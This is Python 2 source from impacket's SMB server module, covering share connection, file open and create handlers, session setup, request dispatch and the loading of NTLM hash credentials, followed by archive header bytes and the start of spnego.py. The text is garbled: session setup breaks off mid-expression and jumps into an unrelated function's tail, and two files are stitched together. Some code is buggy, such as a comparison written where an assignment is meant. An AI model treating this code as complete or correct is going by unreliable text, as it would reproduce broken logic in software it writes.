[respSMBCommand], None, errorCode def smbComTreeDisconnect(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_DISCONNECT) # Check if the Tid matches the Tid trying to disconnect respParameters = '' respData = '' if connData['ConnectedShares'].has_key(recvPacket['Tid']): smbServer.log("Disconnecting Share(%d:%s)" % (recvPacket['Tid'],connData['ConnectedShares'][recvPacket['Tid']]['shareName'])) del(connData['ConnectedShares'][recvPacket['Tid']]) errorCode = STATUS_SUCCESS else: # STATUS_SMB_BAD_TID errorCode = STATUS_SMB_BAD_TID respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComLogOffAndX(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_LOGOFF_ANDX) # Check if the Uid matches the user trying to logoff respParameters = '' respData = '' if recvPacket['Uid'] != connData['Uid']: # STATUS_SMB_BAD_UID errorCode = STATUS_SMB_BAD_UID else: errorCode = STATUS_SUCCESS respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData connData['Uid'] = 0 smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComQueryInformation2(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_QUERY_INFORMATION2) respParameters = smb.SMBQueryInformation2Response_Parameters() respData = '' queryInformation2 = smb.SMBQueryInformation2_Parameters(SMBCommand['Parameters']) errorCode = 0xFF if connData['OpenedFiles'].has_key(queryInformation2['Fid']): errorCode = STATUS_SUCCESS pathName = connData['OpenedFiles'][queryInformation2['Fid']]['FileName'] try: (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(pathName) respParameters['CreateDate'] = getSMBDate(ctime) respParameters['CreationTime'] = getSMBTime(ctime) respParameters['LastAccessDate'] = getSMBDate(atime) respParameters['LastAccessTime'] = getSMBTime(atime) respParameters['LastWriteDate'] = getSMBDate(mtime) respParameters['LastWriteTime'] = getSMBTime(mtime) respParameters['FileDataSize'] = size respParameters['FileAllocationSize'] = size attribs = 0 if os.path.isdir(pathName): attribs = smb.SMB_FILE_ATTRIBUTE_DIRECORY if os.path.isfile(pathName): attribs = smb.SMB_FILE_ATTRIBUTE_NORMAL respParameters['FileAttributes'] = attribs except Exception, e: smbServer.log('smbComQueryInformation2 %s' % e,logging.ERROR) errorCode = STATUS_ACCESS_DENIED if errorCode > 0: respParameters = '' respData = '' respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComNtCreateAndX(self, connId, smbServer, SMBCommand, recvPacket): # TODO: Fully implement this connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX) respParameters = smb.SMBNtCreateAndXResponse_Parameters() respData = '' ntCreateAndXParameters = smb.SMBNtCreateAndX_Parameters(SMBCommand['Parameters']) ntCreateAndXData = smb.SMBNtCreateAndX_Data( flags = recvPacket['Flags2'], data = SMBCommand['Data']) #if ntCreateAndXParameters['CreateFlags'] & 0x10: # NT_CREATE_REQUEST_EXTENDED_RESPONSE # respParameters = smb.SMBNtCreateAndXExtendedResponse_Parameters() # respParameters['VolumeGUID'] = '\x00' errorCode = 0xFF # Get the Tid associated if connData['ConnectedShares'].has_key(recvPacket['Tid']): # If we have a rootFid, the path is relative to that fid errorCode = STATUS_SUCCESS if ntCreateAndXParameters['RootFid'] > 0: path = connData['OpenedFiles'][ntCreateAndXParameters['RootFid']]['FileName'] print "RootFid present %s!" % path else: if connData['ConnectedShares'][recvPacket['Tid']].has_key('path'): path = connData['ConnectedShares'][recvPacket['Tid']]['path'] else: path = 'NONE' errorCode = STATUS_ACCESS_DENIED deleteOnClose = False fileName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],ntCreateAndXData['FileName']).replace('\\','/')) if len(fileName) > 0: # strip leading '/' fileName = fileName[1:] pathName = os.path.join(path,fileName) createDisposition = ntCreateAndXParameters['Disposition'] mode = 0 if createDisposition == smb.FILE_SUPERSEDE: mode |= os.O_TRUNC | os.O_CREAT elif createDisposition & smb.FILE_OVERWRITE_IF == smb.FILE_OVERWRITE_IF: mode |= os.O_TRUNC | os.O_CREAT elif createDisposition & smb.FILE_OVERWRITE == smb.FILE_OVERWRITE: if os.path.exists(pathName) is True: mode |= os.O_TRUNC else: errorCode = STATUS_NO_SUCH_FILE elif createDisposition & smb.FILE_OPEN_IF == smb.FILE_OPEN_IF: if os.path.exists(pathName) is True: mode |= os.O_TRUNC else: mode |= os.O_TRUNC | os.O_CREAT elif createDisposition & smb.FILE_CREATE == smb.FILE_CREATE: if os.path.exists(pathName) is True: errorCode = STATUS_OBJECT_NAME_COLLISION else: mode |= os.O_CREAT elif createDisposition & smb.FILE_OPEN == smb.FILE_OPEN: if os.path.exists(pathName) is not True and smbServer.getRegisteredNamedPipes().has_key(unicode(pathName)) is not True: errorCode = STATUS_NO_SUCH_FILE if errorCode == STATUS_SUCCESS: desiredAccess = ntCreateAndXParameters['AccessMask'] if desiredAccess & smb.FILE_READ_DATA: mode |= os.O_RDONLY if desiredAccess & smb.FILE_WRITE_DATA: if desiredAccess & smb.FILE_READ_DATA: mode |= os.O_RDWR | os.O_APPEND else: mode |= os.O_WRONLY | os.O_APPEND if desiredAccess & smb.GENERIC_ALL: mode |= os.O_RDWR | os.O_APPEND createOptions = ntCreateAndXParameters['CreateOptions'] if mode & os.O_CREAT == os.O_CREAT: if createOptions & smb.FILE_DIRECTORY_FILE == smb.FILE_DIRECTORY_FILE: try: # Let's create the directory os.mkdir(pathName) mode = os.O_RDONLY except Exception, e: smbServer.log("NTCreateAndX: %s,%s,%s" % (pathName,mode,e),logging.ERROR) errorCode = STATUS_ACCESS_DENIED if createOptions & smb.FILE_NON_DIRECTORY_FILE == smb.FILE_NON_DIRECTORY_FILE: # If the file being opened is a directory, the server MUST fail the request with # STATUS_FILE_IS_A_DIRECTORY in the Status field of the SMB Header in the server # response. if os.path.isdir(pathName) is True: errorCode = STATUS_FILE_IS_A_DIRECTORY if createOptions & smb.FILE_DELETE_ON_CLOSE == smb.FILE_DELETE_ON_CLOSE: deleteOnClose = True if errorCode == STATUS_SUCCESS: try: if os.path.isdir(pathName) and sys.platform == 'win32': fid = VOID_FILE_DESCRIPTOR else: if sys.platform == 'win32': mode |= os.O_BINARY if smbServer.getRegisteredNamedPipes().has_key(unicode(pathName)): fid = PIPE_FILE_DESCRIPTOR sock = socket.socket() sock.connect(smbServer.getRegisteredNamedPipes()[unicode(pathName)]) else: fid = os.open(pathName, mode) except Exception, e: smbServer.log("NTCreateAndX: %s,%s,%s" % (pathName,mode,e),logging.ERROR) print e fid = 0 errorCode = STATUS_ACCESS_DENIED else: errorCode == STATUS_SMB_BAD_TID if errorCode == STATUS_SUCCESS: # Simple way to generate a fid if len(connData['OpenedFiles']) == 0: fakefid = 1 else: fakefid = connData['OpenedFiles'].keys()[-1] + 1 respParameters['Fid'] = fakefid respParameters['CreateAction'] = createDisposition if fid == PIPE_FILE_DESCRIPTOR: respParameters['FileAttributes'] = 0x80 respParameters['IsDirectory'] = 0 respParameters['CreateTime'] = 0 respParameters['LastAccessTime'] = 0 respParameters['LastWriteTime'] = 0 respParameters['LastChangeTime'] = 0 respParameters['AllocationSize'] = 4096 respParameters['EndOfFile'] = 0 respParameters['FileType'] = 2 respParameters['IPCState'] = 0x5ff else: if os.path.isdir(pathName): respParameters['FileAttributes'] = smb.SMB_FILE_ATTRIBUTE_DIRECORY respParameters['IsDirectory'] = 1 else: respParameters['IsDirectory'] = 0 respParameters['FileAttributes'] = ntCreateAndXParameters['FileAttributes'] # Let's get this file's information respInfo, errorCode = queryPathInformation('',pathName,level= smb.SMB_QUERY_FILE_ALL_INFO) if errorCode == STATUS_SUCCESS: respParameters['CreateTime'] = respInfo['CreationTime'] respParameters['LastAccessTime'] = respInfo['LastAccessTime'] respParameters['LastWriteTime'] = respInfo['LastWriteTime'] respParameters['LastChangeTime'] = respInfo['LastChangeTime'] respParameters['FileAttributes'] = respInfo['ExtFileAttributes'] respParameters['AllocationSize'] = respInfo['AllocationSize'] respParameters['EndOfFile'] = respInfo['EndOfFile'] else: respParameters = '' respData = '' if errorCode == STATUS_SUCCESS: # Let's store the fid for the connection # smbServer.log('Create file %s, mode:0x%x' % (pathName, mode)) connData['OpenedFiles'][fakefid] = {} connData['OpenedFiles'][fakefid]['FileHandle'] = fid connData['OpenedFiles'][fakefid]['FileName'] = pathName connData['OpenedFiles'][fakefid]['DeleteOnClose'] = deleteOnClose if fid == PIPE_FILE_DESCRIPTOR: connData['OpenedFiles'][fakefid]['Socket'] = sock else: respParameters = '' respData = '' respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComOpenAndX(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_OPEN_ANDX) respParameters = smb.SMBOpenAndXResponse_Parameters() respData = '' openAndXParameters = smb.SMBOpenAndX_Parameters(SMBCommand['Parameters']) openAndXData = smb.SMBOpenAndX_Data( flags = recvPacket['Flags2'], data = SMBCommand['Data']) # Get the Tid associated if connData['ConnectedShares'].has_key(recvPacket['Tid']): path = connData['ConnectedShares'][recvPacket['Tid']]['path'] openedFile, mode, pathName, errorCode = openFile(path, decodeSMBString(recvPacket['Flags2'],openAndXData['FileName']), openAndXParameters['DesiredAccess'], openAndXParameters['FileAttributes'], openAndXParameters['OpenMode']) else: errorCode = STATUS_SMB_BAD_TID if errorCode == STATUS_SUCCESS: # Simple way to generate a fid fid = len(connData['OpenedFiles']) + 1 if len(connData['OpenedFiles']) == 0: fid = 1 else: fid = connData['OpenedFiles'].keys()[-1] + 1 respParameters['Fid'] = fid if mode & os.O_CREAT: # File did not exist and was created respParameters['Action'] = 0x2 elif mode & os.O_RDONLY: # File existed and was opened respParameters['Action'] = 0x1 elif mode & os.O_APPEND: # File existed and was opened respParameters['Action'] = 0x1 else: # File existed and was truncated respParameters['Action'] = 0x3 # Let's store the fid for the connection #smbServer.log('Opening file %s' % pathName) connData['OpenedFiles'][fid] = {} connData['OpenedFiles'][fid]['FileHandle'] = openedFile connData['OpenedFiles'][fid]['FileName'] = pathName connData['OpenedFiles'][fid]['DeleteOnClose'] = False else: respParameters = '' respData = '' respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) resp = smb.NewSMBPacket() resp['Flags1'] = smb.SMB.FLAGS1_REPLY resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS resp['Tid'] = recvPacket['Tid'] resp['Mid'] = recvPacket['Mid'] resp['Pid'] = connData['Pid'] respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX) respParameters = smb.SMBTreeConnectAndXResponse_Parameters() respData = smb.SMBTreeConnectAndXResponse_Data() treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters']) if treeConnectAndXParameters['Flags'] & 0x8: respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters() treeConnectAndXData = smb.SMBTreeConnectAndX_Data( flags = recvPacket['Flags2'] ) treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength'] treeConnectAndXData.fromString(SMBCommand['Data']) errorCode = STATUS_SUCCESS ## Process here the request, does the share exist? path = ntpath.basename(decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])) share = searchShare(connId, path, smbServer) if share is not None: # Simple way to generate a Tid if len(connData['ConnectedShares']) == 0: tid = 1 else: tid = connData['ConnectedShares'].keys()[-1] + 1 connData['ConnectedShares'][tid] = share connData['ConnectedShares'][tid]['shareName'] = path resp['Tid'] = tid #smbServer.log("Connecting Share(%d:%s)" % (tid,path)) else: smbServer.log("TreeConnectAndX not found %s" % path, logging.ERROR) errorCode = STATUS_OBJECT_PATH_NOT_FOUND resp['ErrorCode'] = errorCode >> 16 resp['ErrorClass'] = errorCode & 0xff ## respParameters['OptionalSupport'] = smb.SMB.SMB_SUPPORT_SEARCH_BITS if path == 'IPC$': respData['Service'] = 'IPC' else: respData['Service'] = 'A:' respData['PadLen'] = 0 respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS' ) respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData resp['Uid'] = connData['Uid'] resp.addCommand(respSMBCommand) smbServer.setConnectionData(connId, connData) return None, [resp], errorCode def smbComSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId, checkStatus = False) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX) # From [MS-SMB] # When extended security is being used (see section 3.2.4.2.4), the # request MUST take the following form # [..] # WordCount (1 byte): The value of this field MUST be 0x0C. if SMBCommand['WordCount'] == 12: # Extended security. Here we deal with all SPNEGO stuff respParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters() respData = smb.SMBSessionSetupAndX_Extended_Response_Data(flags = recvPacket['Flags2']) sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(SMBCommand['Parameters']) sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data() sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength'] sessionSetupData.fromString(SMBCommand['Data']) connData['Capabilities'] = sessionSetupParameters['Capabilities'] if struct.unpack('B',sessionSetupData['SecurityBlob'][0])[0] != smb.ASN1_AID: # If there no GSSAPI ID, it must be an AUTH packet blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob']) token = blob['ResponseToken'] else: # NEGOTIATE packet blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob']) token = blob['MechToken'] # Here we only handle NTLMSSP, depending on what stage of the # authentication we are, we act on it messageType = struct.unpack('> 16 packet['ErrorClass'] = errorCode & 0xff return None, [packet], errorCode class SMBSERVERHandler(SocketServer.BaseRequestHandler): def __init__(self, request, client_address, server, select_poll = False): self.__SMB = server self.__ip, self.__port = client_address self.__request = request self.__connId = threading.currentThread().getName() self.__timeOut = 60*5 self.__select_poll = select_poll #self.__connId = os.getpid() SocketServer.BaseRequestHandler.__init__(self, request, client_address, server) def handle(self): self.__SMB.log("Incoming connection (%s,%d)" % (self.__ip, self.__port)) self.__SMB.addConnection(self.__connId, self.__ip, self.__port) while True: try: # Firt of all let's get the NETBIOS packet session = nmb.NetBIOSTCPSession(self.__SMB.getServerName(),'HOST', self.__ip, sess_port = self.__port, sock = self.__request, select_poll = self.__select_poll) try: p = session.recv_packet(self.__timeOut) except nmb.NetBIOSTimeout: raise if p.get_type() == nmb.NETBIOS_SESSION_REQUEST: # Someone is requesting a session, we're gonna accept them all :) _, rn, my = p.get_trailer().split(' ') remote_name = nmb.decode_name('\x20'+rn) myname = nmb.decode_name('\x20'+my) self.__SMB.log("NetBIOS Session request (%s,%s,%s)" % (self.__ip, remote_name[1].strip(), myname[1])) r = nmb.NetBIOSSessionPacket() r.set_type(nmb.NETBIOS_SESSION_POSITIVE_RESPONSE) r.set_trailer(p.get_trailer()) self.__request.send(r.rawData()) else: resp = self.__SMB.processRequest(self.__connId, p.get_trailer()) # Send all the packets recevied. Except for big transactions this should be # a single packet for i in resp: session.send_packet(str(i)) except Exception, e: self.__SMB.log("Handle: %s" % e) #raise break def finish(self): # Thread/process is dying, we should tell the main SMB thread to remove all this thread data self.__SMB.log("Closing down connection (%s,%d)" % (self.__ip, self.__port)) self.__SMB.removeConnection(self.__connId) return SocketServer.BaseRequestHandler.finish(self) class SMBSERVER(SocketServer.ThreadingMixIn, SocketServer.TCPServer): #class SMBSERVER(SocketServer.ForkingMixIn, SocketServer.TCPServer): def __init__(self, server_address, handler_class=SMBSERVERHandler, config_parser = None): SocketServer.TCPServer.allow_reuse_address = True SocketServer.TCPServer.__init__(self, server_address, handler_class) # Server name and OS to be presented whenever is necessary self.__serverName = '' self.__serverOS = '' self.__serverDomain = '' # Our ConfigParser data self.__serverConfig = None # Explicit configuration data, specified as an already-modified ConfigParser self.__configParser = config_parser # Our credentials to be used during the server's lifetime self.__credentials = {} # Our log file self.__logFile = '' # Registered Named Pipes, format is PipeName,Socket self.__registeredNamedPipes = {} # Our list of commands we will answer, by default the NOT IMPLEMENTED one self.__smbCommandsHandler = SMBCommands() self.__smbTrans2Handler = TRANS2Commands() self.__smbTransHandler = TRANSCommands() self.__smbNTTransHandler = NTTRANSCommands() self.__smbNTTransCommands = { # NT IOCTL, can't find doc for this 0xff :self.__smbNTTransHandler.default } self.__smbTransCommands = { '\\PIPE\\LANMAN' :self.__smbTransHandler.lanMan, smb.SMB.TRANS_TRANSACT_NMPIPE :self.__smbTransHandler.transactNamedPipe, } self.__smbTrans2Commands = { smb.SMB.TRANS2_FIND_FIRST2 :self.__smbTrans2Handler.findFirst2, smb.SMB.TRANS2_FIND_NEXT2 :self.__smbTrans2Handler.findNext2, smb.SMB.TRANS2_QUERY_FS_INFORMATION :self.__smbTrans2Handler.queryFsInformation, smb.SMB.TRANS2_QUERY_PATH_INFORMATION :self.__smbTrans2Handler.queryPathInformation, smb.SMB.TRANS2_QUERY_FILE_INFORMATION :self.__smbTrans2Handler.queryFileInformation, smb.SMB.TRANS2_SET_FILE_INFORMATION :self.__smbTrans2Handler.setFileInformation, smb.SMB.TRANS2_SET_PATH_INFORMATION :self.__smbTrans2Handler.setPathInformation } self.__smbCommands = { smb.SMB.SMB_COM_CREATE_DIRECTORY: self.__smbCommandsHandler.smbComCreateDirectory, smb.SMB.SMB_COM_DELETE_DIRECTORY: self.__smbCommandsHandler.smbComDeleteDirectory, smb.SMB.SMB_COM_RENAME: self.__smbCommandsHandler.smbComRename, smb.SMB.SMB_COM_DELETE: self.__smbCommandsHandler.smbComDelete, smb.SMB.SMB_COM_NEGOTIATE: self.__smbCommandsHandler.smbComNegotiate, smb.SMB.SMB_COM_SESSION_SETUP_ANDX: self.__smbCommandsHandler.smbComSessionSetupAndX, smb.SMB.SMB_COM_LOGOFF_ANDX: self.__smbCommandsHandler.smbComLogOffAndX, smb.SMB.SMB_COM_TREE_CONNECT_ANDX: self.__smbCommandsHandler.smbComTreeConnectAndX, smb.SMB.SMB_COM_TREE_DISCONNECT: self.__smbCommandsHandler.smbComTreeDisconnect, smb.SMB.SMB_COM_ECHO: self.__smbCommandsHandler.smbComEcho, smb.SMB.SMB_COM_QUERY_INFORMATION: self.__smbCommandsHandler.smbQueryInformation, smb.SMB.SMB_COM_TRANSACTION2: self.__smbCommandsHandler.smbTransaction2, smb.SMB.SMB_COM_TRANSACTION: self.__smbCommandsHandler.smbTransaction, # Not needed for now smb.SMB.SMB_COM_NT_TRANSACT: self.__smbCommandsHandler.smbNTTransact, smb.SMB.SMB_COM_QUERY_INFORMATION_DISK: self.__smbCommandsHandler.smbQueryInformationDisk, smb.SMB.SMB_COM_OPEN_ANDX: self.__smbCommandsHandler.smbComOpenAndX, smb.SMB.SMB_COM_QUERY_INFORMATION2: self.__smbCommandsHandler.smbComQueryInformation2, smb.SMB.SMB_COM_READ_ANDX: self.__smbCommandsHandler.smbComReadAndX, smb.SMB.SMB_COM_READ: self.__smbCommandsHandler.smbComRead, smb.SMB.SMB_COM_WRITE_ANDX: self.__smbCommandsHandler.smbComWriteAndX, smb.SMB.SMB_COM_WRITE: self.__smbCommandsHandler.smbComWrite, smb.SMB.SMB_COM_CLOSE: self.__smbCommandsHandler.smbComClose, smb.SMB.SMB_COM_LOCKING_ANDX: self.__smbCommandsHandler.smbComLockingAndX, smb.SMB.SMB_COM_NT_CREATE_ANDX: self.__smbCommandsHandler.smbComNtCreateAndX, 0xFF: self.__smbCommandsHandler.default } # List of active connections self.__activeConnections = {} def getCredentials(self): return self.__credentials def removeConnection(self, name): try: del(self.__activeConnections[name]) except: pass self.log("Remaining connections %s" % self.__activeConnections.keys()) def addConnection(self, name, ip, port): self.__activeConnections[name] = {} # Let's init with some know stuff we will need to have # TODO: Document what's in there #print "Current Connections", self.__activeConnections.keys() self.__activeConnections[name]['PacketNum'] = 0 self.__activeConnections[name]['ClientIP'] = ip self.__activeConnections[name]['ClientPort'] = port self.__activeConnections[name]['Uid'] = 0 self.__activeConnections[name]['ConnectedShares'] = {} self.__activeConnections[name]['OpenedFiles'] = {} # SID results for findfirst2 self.__activeConnections[name]['SIDs'] = {} def setConnectionData(self, connId, data): self.__activeConnections[connId] = data #print "setConnectionData" #print self.__activeConnections def getConnectionData(self, connId, checkStatus = True): conn = self.__activeConnections[connId] if checkStatus is True: if conn.has_key('Authenticated') is not True: # Can't keep going further raise Exception("User not Authenticated!") return conn def getRegisteredNamedPipes(self): return self.__registeredNamedPipes def registerNamedPipe(self, pipeName, address): self.__registeredNamedPipes[unicode(pipeName)] = address return True def hookTransaction(self, transCommand, callback): # If you call this function, callback will replace # the current Transaction sub command. # (don't get confused with the Transaction smbCommand) # If the transaction sub command doesn't not exist, it is added # If the transaction sub command exists, it returns the original function # replaced # # callback MUST be declared as: # callback(connId, smbServer, recvPacket, parameters, data, maxDataCount=0) # # WHERE: # # connId : the connection Id, used to grab/update information about # the current connection # smbServer : the SMBServer instance available for you to ask # configuration data # recvPacket : the full SMBPacket that triggered this command # parameters : the transaction parameters # data : the transaction data # maxDataCount: the max amount of data that can be transfered agreed # with the client # # and MUST return: # respSetup, respParameters, respData, errorCode # # WHERE: # # respSetup: the setup response of the transaction # respParameters: the parameters response of the transaction # respData: the data reponse of the transaction # errorCode: the NT error code if self.__smbTransCommands[transCommand].has_key(str(transCommand)): originalCommand = self.__smbTransCommands[str(transCommand)] else: originalCommand = None self.__smbTransCommands[str(transCommand)] = callback return originalCommand def hookTransaction2(self, transCommand, callback): # Here we should add to __smbTrans2Commands # Same description as Transaction if self.__smbTrans2Commands[transCommand].has_key(transCommand): originalCommand = self.__smbTrans2Commands[transCommand] else: originalCommand = None self.__smbTrans2Commands[transCommand] = callback return originalCommand def hookNTTransaction(self, transCommand, callback): # Here we should add to __smbNTTransCommands # Same description as Transaction if self.__smbNTTransCommands[transCommand].has_key(transCommand): originalCommand = self.__smbNTTransCommands[transCommand] else: originalCommand = None self.__smbNTTransCommands[transCommand] = callback return originalCommand def hookSmbCommand(self, smbCommand, callback): # Here we should add to self.__smbCommands # If you call this function, callback will replace # the current smbCommand. # If smbCommand doesn't not exist, it is added # If SMB command exists, it returns the original function replaced # # callback MUST be declared as: # callback(connId, smbServer, SMBCommand, recvPacket) # # WHERE: # # connId : the connection Id, used to grab/update information about # the current connection # smbServer : the SMBServer instance available for you to ask # configuration data # SMBCommand: the SMBCommand itself, with its data and parameters. # Check smb.py:SMBCommand() for a reference # recvPacket: the full SMBPacket that triggered this command # # and MUST return: # , , errorCode # has higher preference over commands, in case you # want to change the whole packet # errorCode: the NT error code # # For SMB_COM_TRANSACTION2, SMB_COM_TRANSACTION and SMB_COM_NT_TRANSACT # the callback function is slightly different: # # callback(connId, smbServer, SMBCommand, recvPacket, transCommands) # # WHERE: # # transCommands: a list of transaction subcommands already registered # if self.__smbCommands.has_key(smbCommand): originalCommand = self.__smbCommands[smbCommand] else: originalCommand = None self.__smbCommands[smbCommand] = callback return originalCommand def log(self, msg, level=logging.INFO): self.__log.log(level,msg) def getServerName(self): return self.__serverName def getServerOS(self): return self.__serverOS def getServerDomain(self): return self.__serverDomain def getServerConfig(self): return self.__serverConfig def verify_request(self, request, client_address): # TODO: Control here the max amount of processes we want to launch # returning False, closes the connection return True def processRequest(self, connId, data): # TODO: Process batched commands. packet = smb.NewSMBPacket(data = data) SMBCommand = smb.SMBCommand(packet['Data'][0]) try: # Search out list of implemented commands # We provide them with: # connId : representing the data for this specific connection # self : the SMBSERVER if they want to ask data to it # SMBCommand : the SMBCommand they are expecting to process # packet : the received packet itself, in case they need more data than the actual command # Only for Transactions # transCommand: a list of transaction subcommands # We expect to get: # respCommands: a list of answers for the commands processed # respPacket : if the commands chose to directly craft packet/s, we use this and not the previous # this MUST be a list # errorCode : self explanatory if packet['Command'] == smb.SMB.SMB_COM_TRANSACTION2: respCommands, respPackets, errorCode = self.__smbCommands[packet['Command']]( connId, self, SMBCommand, packet, self.__smbTrans2Commands) elif packet['Command'] == smb.SMB.SMB_COM_NT_TRANSACT: respCommands, respPackets, errorCode = self.__smbCommands[packet['Command']]( connId, self, SMBCommand, packet, self.__smbNTTransCommands) elif packet['Command'] == smb.SMB.SMB_COM_TRANSACTION: respCommands, respPackets, errorCode = self.__smbCommands[packet['Command']]( connId, self, SMBCommand, packet, self.__smbTransCommands) else: if self.__smbCommands.has_key(packet['Command']): respCommands, respPackets, errorCode = self.__smbCommands[packet['Command']]( connId, self, SMBCommand, packet) else: respCommands, respPackets, errorCode = self.__smbCommands[255](connId, self, SMBCommand, packet) except Exception, e: # Something wen't wrong, defaulting to Bad user ID self.log('processRequest (0x%x,%s)' % (packet['Command'],e), logging.ERROR) raise packet['Flags1'] |= smb.SMB.FLAGS1_REPLY packet['Flags2'] = 0 errorCode = STATUS_SMB_BAD_UID packet['ErrorCode'] = errorCode >> 16 packet['ErrorClass'] = errorCode & 0xff return [packet] # We prepare the response packet to commands don't need to bother about that. connData = self.getConnectionData(connId, False) # Force reconnection loop.. This is just a test.. client will send me back credentials :) #connData['PacketNum'] += 1 #if connData['PacketNum'] == 15: # connData['PacketNum'] = 0 # # Something wen't wrong, defaulting to Bad user ID # self.log('Sending BAD USER ID!', logging.ERROR) # #raise # packet['Flags1'] |= smb.SMB.FLAGS1_REPLY # packet['Flags2'] = 0 # errorCode = STATUS_SMB_BAD_UID # packet['ErrorCode'] = errorCode >> 16 # packet['ErrorClass'] = errorCode & 0xff # return [packet] self.setConnectionData(connId, connData) packetsToSend = [] if respPackets is None: for respCommand in respCommands: respPacket = smb.NewSMBPacket() respPacket['Flags1'] = smb.SMB.FLAGS1_REPLY # TODO this should come from a per session configuration respPacket['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | packet['Flags2'] & smb.SMB.FLAGS2_UNICODE #respPacket['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES #respPacket['Flags1'] = 0x98 #respPacket['Flags2'] = 0xc807 respPacket['Tid'] = packet['Tid'] respPacket['Mid'] = packet['Mid'] respPacket['Pid'] = packet['Pid'] respPacket['Uid'] = connData['Uid'] respPacket['ErrorCode'] = errorCode >> 16 respPacket['_reserved'] = errorCode >> 8 & 0xff respPacket['ErrorClass'] = errorCode & 0xff respPacket.addCommand(respCommand) packetsToSend.append(respPacket) else: # The SMBCommand took care of building the packet packetsToSend = respPackets return packetsToSend def processConfigFile(self, configFile = None): # TODO: Do a real config parser if self.__configParser is None: if configFile is None: configFile = self.__configFile self.__serverConfig = ConfigParser.ConfigParser() self.__serverConfig.read(configFile) else: self.__serverConfig = self.__configParser self.__serverName = self.__serverConfig.get('global','server_name') self.__serverOS = self.__serverConfig.get('global','server_os') self.__serverDomain = self.__serverConfig.get('global','server_domain') self.__logFile = self.__serverConfig.get('global','log_file') logging.basicConfig(filename = self.__logFile, level = logging.DEBUG, format="%(asctime)s: %(levelname)s: %(message)s", datefmt = '%m/%d/%Y %I:%M:%S %p') self.__log = logging.getLogger() # Process the credentials credentials_fname = self.__serverConfig.get('global','credentials_file') if credentials_fname is not "": cred = open(credentials_fname) line = cred.readline() while line: name, domain, lmhash, nthash = line.split(':') self.__credentials[name] = (domain, lmhash, nthash.strip('\r\n')) line = cred.readline() cred.close() self.log('Config file parsed') # NT ERRORS and STATUS codes STATUS_SUCCESS = 0x00000000 STATUS_FILE_IS_A_DIRECTORY = 0xC00000BA STATUS_ACCESS_DENIED = 0xC0000022 STATUS_MORE_PROCESSING_REQUIRED = 0xC0000016 STATUS_NOT_SUPPORTED = 0xC00000BB STATUS_OBJECT_NAME_NOT_FOUND = 0xC0000034 STATUS_OBJECT_PATH_NOT_FOUND = 0xC000003A STATUS_SMB_BAD_TID = 0x00050002 STATUS_SMB_BAD_UID = 0x005B0002 STATUS_NO_SUCH_FILE = 0xC000000F STATUS_OBJECT_NAME_COLLISION = 0xC0000035 STATUS_DIRECTORY_NOT_EMPTY = 0xC0000101 STATUS_INVALID_HANDLE = 0xC0000008 STATUS_NOT_IMPLEMENTED = 0xC0000002 STATUS_LOGON_FAILURE = 0xC000006d # For windows platforms, opening a directory is not an option, so we set a void FD VOID_FILE_DESCRIPTOR = -1 PIPE_FILE_DESCRIPTOR = -2 impacket-0.9.10/impacket/spnego.py0000600000076500000240000003377312141750575017130 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies) # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: spnego.py 670 2012-08-15 23:52:50Z bethus@gmail.com $ # # Author: Alberto Solino (beto@coresecurity.com) # # Description: # SPNEGO functions used by SMB, SMB2/3 and DCERPC # import string import struct from struct import pack, unpack, calcsize ############### GSS Stuff ################ GSS_API_SPNEGO_UUID = '\x2b\x06\x01\x05\x05\x02' 